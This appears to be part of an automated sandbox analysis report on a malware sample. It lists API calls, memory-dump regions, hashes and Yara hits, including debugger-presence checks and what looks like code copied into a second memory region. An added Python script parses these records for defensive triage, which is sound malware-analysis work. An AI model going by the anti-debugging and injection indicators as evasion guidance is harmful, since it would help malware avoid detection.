                        • String ID: $]s+$S4}r$[Guo$`1$u.m&$Nv
                        • API String ID: 0-1713350812
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID: text
                        • API String ID: 3197321146-999008199
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: l[/$'$v$;q-{$Q#O?
                        • API String ID: 0-486151937
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: ^}$$9~~$25?/$?z
                        • API String ID: 0-1240198085
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                        • IsDebuggerPresent.KERNEL32 ref: 0040A662
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0493A7FD
                        • IsDebuggerPresent.KERNEL32 ref: 0493A8C9
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0493A8E9
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0493A8F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: ;u]$LMS>$`[hs
                        • API String ID: 0-435302392
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1rv_$DNgO${%T~
                        • API String ID: 0-2343050665
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: a|{?$pq;[$w W
                        • API String ID: 0-3988622055
                        • Opcode ID: d7470877e0e76858b03681f25e4da93e8f27231e4cd9f11313eca4db34a1626c
                        • Instruction ID: e9d40dfd9a7116305c20cf60e706afea5c2e4606634e6c813d8c2ecad833bd6a
                        • Opcode Fuzzy Hash: d7470877e0e76858b03681f25e4da93e8f27231e4cd9f11313eca4db34a1626c
                        • Instruction Fuzzy Hash: BE4229F36082149FE3046E2DEC8567AFBE9EF94720F1A453EEAC4C7340E97598058696
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                        • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                        • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                        • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04932AA0), ref: 0493D142
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04932AA0), ref: 0493D14C
                        • UnhandledExceptionFilter.KERNEL32(0493277A,?,?,?,?,?,04932AA0), ref: 0493D159
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                        • Instruction ID: 34ded91ae66ba47a41276a88eca504d48e69a35d7258192db0b25e70c6f93b44
                        • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                        • Instruction Fuzzy Hash: 6F31D8749112289BCB21DF64DC89BCCBBB8BF48315F5041EAE40CA7260E770AF858F44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1"lU$m]Ox
                        • API String ID: 0-3289623548
                        • Opcode ID: 6155e624c5b084394bd27a016f6c9e02836d90db60e16eaaa9e92df87385a8ab
                        • Instruction ID: a2e2954c1da0abe985a1044130f123857017852bd46b2f4eab8ebedd4f1a02c2
                        • Opcode Fuzzy Hash: 6155e624c5b084394bd27a016f6c9e02836d90db60e16eaaa9e92df87385a8ab
                        • Instruction Fuzzy Hash: B4B2F6F360C200AFE304AE2DEC4567AF7E9EF94720F16892DE6C5C3744EA3598458697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$GetProcAddress.$l
                        • API String ID: 0-2784972518
                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction ID: 6b9b36a192e3e9ea31a7229c7929fc2729a9d8dbe7cfa250a2b719c887260d90
                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction Fuzzy Hash: 38316CB6900609DFEB10CF99C880AAEBBF9FF49329F14405AD541AB314D771FA45CBA4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 3/W$f|=
                        • API String ID: 0-3293423881
                        • Opcode ID: e719218062571db7189fe2f618259ddad816d4651695f0c4742ea4f7a301a673
                        • Instruction ID: 5b6326a9bd7d02d22e9a9d8912c61077a58df046f69f4183a4525eb3e4986dce
                        • Opcode Fuzzy Hash: e719218062571db7189fe2f618259ddad816d4651695f0c4742ea4f7a301a673
                        • Instruction Fuzzy Hash: 9F72D7F3A082009FE304AE2DDC4576AF7EAEFD4720F1A893DE6C4D7744E63598058696
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1518329722-0
                        • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                        • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                        • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                        • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: V[$e-^o
                        • API String ID: 0-399160139
                        • Opcode ID: f80bc837f5cf1e86fbc6a2c2d4cb8e605d68a4e09353f28af1213833bebb2982
                        • Instruction ID: 100894d1b743f99ad40275f00bbca0588ff4c32b3e1e2f5f342a9bd6ccd1f438
                        • Opcode Fuzzy Hash: f80bc837f5cf1e86fbc6a2c2d4cb8e605d68a4e09353f28af1213833bebb2982
                        • Instruction Fuzzy Hash: 634149F3E042284BF308A93EDD98377BA86DB80750F1B823DDB8597BC4E87D59054295
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: Sc
                        • API String ID: 0-3933943610
                        • Opcode ID: ccdec714957d094498e67adc2564fcd0d6def5a20aabb558cc76e55e184e30e3
                        • Instruction ID: b3f39aab87ec66ac607758d1bda7760b1467beadc809b28dc988eadddf18fab7
                        • Opcode Fuzzy Hash: ccdec714957d094498e67adc2564fcd0d6def5a20aabb558cc76e55e184e30e3
                        • Instruction Fuzzy Hash: 411269F3A082149FE3046E2DEC4577ABBE9EF94720F1A863DEAC4C7740F57598058686
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04945990,?,?,00000008,?,?,0494C8F1,00000000), ref: 04945BC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction ID: 465a892a4f4d3f42855d86089aadac46603aef8161539a223c1ae585d88c4d3f
                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction Fuzzy Hash: 7FB13E31610608EFD715CF68C48AF657BE1FF85365F2A8668E999CF2A1C335E981CB40
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-0
                        • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                        • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                        • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                        • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction ID: 3c86b5082e8d69261092a566fc7116ef82f045dd3f36460ee5d119ba5ccfeeec
                        • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction Fuzzy Hash: 9E4185B580421DAFDB20DFA9CC88EEABBBDEF85304F1441E9E41993240DB34AE458F50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                        • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                        • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                        • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                        • Instruction ID: 80d39860ba596042c6fc9439c19d35131d79081112385e104b5c6a497e5f476b
                        • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                        • Instruction Fuzzy Hash: 14C1E238E00606CFDB24CF68C588A7ABBBAFF87306F144A39D45697699D330B945CB51
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                        • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                        • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                        • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 0
                        • API String ID: 0-4108050209
                        • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                        • Instruction ID: df02c9979792838335ad85f5bf0a52fdc08c31d9d2e86d80961a4d51b3c6a9f5
                        • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                        • Instruction Fuzzy Hash: 0EB1D374A0460B8BDF348FA8C558ABEBBA9EF47306F04063DE452D7694D771B901CB51
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction Fuzzy Hash:
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0493A30B), ref: 0493A98C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                        • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                        • Instruction Fuzzy Hash:
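The records above carry two details worth pulling out before scoring the sample. First, several Opcode IDs (e.g. e03884c1... for the RaiseException routine and f7f15cac... for the SetUnhandledExceptionFilter routine) appear both in the image loaded at 00400000 (based on PE: true) and in the region at 04930000 (based on PE: false, Yara matches), so the same function bodies exist in both places; that is something to confirm by diffing the two dumps rather than reading off the table. Second, the IsDebuggerPresent / SetUnhandledExceptionFilter / UnhandledExceptionFilter triple is also the call sequence the MSVC CRT uses in its security-cookie failure handler (__raise_securityfailure), so on its own it is a weak anti-debug indicator. The script below is an added example, not Joe Sandbox code and not part of the sample: it parses an excerpt of this report's own records (copied from the page and trimmed to the fields it uses), reports Opcode IDs shared across dump regions, and tags the two patterns just mentioned. It assumes the plain-text layout shown here (fields introduced by "•", one record per "Instruction Fuzzy Hash" line); the CRT tag carries a question mark because it is a hint to verify in a disassembler, not a verdict.

```python
import re
from collections import defaultdict

# Excerpt of this report's own function records (copied from the page, trimmed to
# the fields the parser uses) so the script runs offline against realistic input.
REPORT_EXCERPT = """\
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
• Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Yara matches
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
• Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
• Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Yara matches
• API ID: ExceptionRaise
• Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
• Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04945990,?,?,00000008,?,?,0494C8F1,00000000), ref: 04945BC2
• Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
Yara matches
• API ID: ExceptionRaise
• Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
• Instruction Fuzzy Hash: 7FB13E31610608EFD715CF68C48AF657BE1FF85365F2A8668E999CF2A1C335E981CB40
• SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
• Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Yara matches
• API ID: ExceptionFilterUnhandled
• Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
• Instruction Fuzzy Hash:
• SetUnhandledExceptionFilter.KERNEL32(0040A72C,0493A30B), ref: 0493A98C
• Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
Yara matches
• API ID: ExceptionFilterUnhandled
• Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
• Instruction Fuzzy Hash:
"""

API_LINE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^()]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE = re.compile(r"Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")

def parse_records(text):
    """Split report text into one dict per function record (terminated by its fuzzy-hash line)."""
    records, cur = [], {"apis": [], "yara": False}
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Yara matches":
            cur["yara"] = True
            continue
        if not line.startswith("•"):
            continue                      # section labels (APIs, Strings, Similarity, ...)
        body = line.lstrip("• ")
        api = API_LINE.match(body)
        if api:                           # e.g. RaiseException.KERNEL32(C000000D,...), ref: 0041595B
            cur["apis"].append((api["name"], api["module"], api["args"].split(",")))
            continue
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE.search(value)
            cur["region"] = int(m["off"], 16)
            cur["based_on_pe"] = m["pe"] == "true"
        else:
            cur[key] = value              # API ID, Opcode ID, Instruction Fuzzy Hash (may be empty)
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = {"apis": [], "yara": False}
    return records

def shared_opcodes(records):
    """Opcode IDs present in more than one dump region -> sorted region base addresses."""
    seen = defaultdict(set)
    for r in records:
        seen[r["Opcode ID"]].add(r["region"])
    return {op: sorted(regs) for op, regs in seen.items() if len(regs) > 1}

def annotate(record):
    """Analyst hints: well-known constants and one CRT call pattern worth double-checking."""
    tags = []
    names = {name for name, _, _ in record["apis"]}
    if {"IsDebuggerPresent", "SetUnhandledExceptionFilter", "UnhandledExceptionFilter"} <= names:
        # Same sequence as the MSVC CRT security-cookie failure handler; the "?" marks
        # it as a hint to confirm in a disassembler, not an anti-debug verdict.
        tags.append("crt:gs-failure-handler?")
    for name, _, args in record["apis"]:
        if name == "RaiseException" and args[0].upper() == "C000000D":
            tags.append("const:STATUS_INVALID_PARAMETER")
        if name == "IsProcessorFeaturePresent" and args[0].upper() == "0000000A":
            tags.append("const:PF_XMMI64_INSTRUCTIONS_AVAILABLE(SSE2)")
    return tags

if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    for op, regs in shared_opcodes(recs).items():
        print(f"opcode {op[:16]}... in regions " + ", ".join(f"{r:08X}" for r in regs))
    for r in recs:
        if annotate(r):
            print(f"{r['region']:08X} {r['API ID']}: {annotate(r)} yara={r['yara']} pe={r['based_on_pe']}")
```

Run it against the full report text instead of the excerpt to get the complete cross-region map; the parser only needs the bullet fields, so the surrounding "APIs", "Memory Dump Source" and "Similarity" labels can stay in the input. Records whose fuzzy hash is empty (as two of the ones above are) still terminate correctly because the key, not the value, marks the end of a record.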
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDL
                        • API String ID: 0-3662016964
                        • Opcode ID: ea1a609b4e81e7ed3fd3bef85d183cecf4d96ae76ec57f2d8d21cd8a4a84b692
                        • Instruction ID: e7beae17156f010978ca05b93af2ee6da6283093d04dc20b6ad1bd8cd610a5b2
                        • Opcode Fuzzy Hash: ea1a609b4e81e7ed3fd3bef85d183cecf4d96ae76ec57f2d8d21cd8a4a84b692
                        • Instruction Fuzzy Hash: 9651387290820E8FDB11CF24C5401FF37A1EB96361F24C52BD84A97A41C77A4E66EE5E
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                        • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                        • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
